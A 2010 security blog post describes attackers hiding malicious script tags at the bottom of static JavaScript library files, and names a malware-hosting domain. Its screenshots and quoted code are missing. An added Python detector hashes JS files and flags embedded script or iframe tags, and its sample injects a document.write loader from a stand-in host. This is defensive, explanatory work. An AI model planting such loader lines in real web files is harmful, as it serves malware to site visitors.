Thursday, August 12, 2010

Malicious scripts hidden inside JavaScript files – a new trick used by attackers

We have written many blog posts on malicious iframes or script injection in dynamic webpages. The malicious iframe/script tags were typically injected at the bottom of webpages or after HTML tags such as , etc. Often, they are very easy to find once you know that a site is infected: you can easily see the injected malicious code just by opening the source of the page and inspecting the typical injection locations. Recently, however, we have been seeing another trick used by attackers, whereby malicious iframe/script tags are injected into static JavaScript files rather than into the page itself. These are static files in the sense that they are JavaScript libraries used for various purposes. The attacker uses this trick so that it is difficult to identify the injected iframe by inspecting only the source of the page. It also allows multiple pages to be infected while injecting content into only a single location. Let’s walk through a live example of an infected website. Here is a screenshot of the website:

Interestingly, at present, Firefox does not provide any warning about the threat while Google Chrome does, despite the fact that both leverage Google SafeBrowsing block lists. Here is the block message from Chrome:

Chrome blocks this website with a message saying “this site contains elements from the site ‘malepad.ru’ which appears to host malware”. I initially searched for malicious iframe/script tags inside the page source but could not identify any. The source of the page looked clean at first glance. I then saw some JavaScript files being used inside the webpage; however, they too appeared legitimate. Here is the source of the main page:

I then inspected the source code of the JavaScript files and found that they had clearly been altered. Let’s look at “blockcurrencies.js” as an example:

The malicious script code is injected at the bottom of the JavaScript file. If you look at the Chrome block image above, you will find that this is the site named in the Chrome message. Every JavaScript file referenced by the main webpage was injected with malicious script tags like the one shown above. Interestingly, we have also found the following malicious code present in JavaScript files on other sites:

It is interesting to study the various tricks and techniques attackers use to hide their malicious code. We have seen an increase in attacks where malicious content is injected into static JavaScript files.

This is a good lesson: do not inspect only the source code of the main page when looking for malicious content.
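One way to check static JavaScript files for this kind of tampering is sketched below, as an added example that is not code from the original post. It compares each file against a SHA-256 baseline of a known-good copy and reports embedded script/iframe tags that load from hosts outside an allowlist; the file contents, the `injected.example` and `www.example.com` hosts, and the function names are constructed for illustration.

```python
import hashlib
import re

# Embedded <script>/<iframe> markup inside JS text (for example in document.write).
# Quotes may be backslash-escaped; the URL may be absolute or protocol-relative.
TAG_SRC = re.compile(
    r"""<\s*(script|iframe)\b[^>]*?\bsrc\s*=\s*\\?["']?\s*(?:https?:)?//([^/"'\\\s>]+)""",
    re.IGNORECASE,
)

def external_tags(js_source, allowed_hosts):
    """Return (line_no, tag, host) for each embedded tag loading from an unlisted host."""
    findings = []
    for line_no, line in enumerate(js_source.splitlines(), start=1):
        for m in TAG_SRC.finditer(line):
            host = m.group(2).lower().split(":")[0]  # drop any port
            if host not in allowed_hosts:
                findings.append((line_no, m.group(1).lower(), host))
    return findings

def audit(files, baseline, allowed_hosts):
    """files: name -> current JS text; baseline: name -> SHA-256 of the known-good copy."""
    report = {}
    for name, text in files.items():
        digest = hashlib.sha256(text.encode("utf-8")).hexdigest()
        report[name] = {
            "modified": baseline.get(name) != digest,
            "tags": external_tags(text, allowed_hosts),
        }
    return report

# Constructed sample: a small library, then the same file with a tag appended at the bottom.
CLEAN = "function convert(amount, rate) {\n  return amount * rate;\n}\n"
INJECTED = CLEAN + "document.write('<script src=\"http://injected.example/x.js\"><\\/script>');\n"
BASELINE = {"blockcurrencies.js": hashlib.sha256(CLEAN.encode("utf-8")).hexdigest()}

if __name__ == "__main__":
    result = audit({"blockcurrencies.js": INJECTED}, BASELINE, {"www.example.com"})
    for name, info in result.items():
        print(name, "modified:", info["modified"], "tags:", info["tags"])
```

The tag pattern only catches markup written out literally; an injection assembled from concatenated or encoded strings would not match it, but the hash comparison still flags the file as modified.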

Have you checked your web files?

Umesh
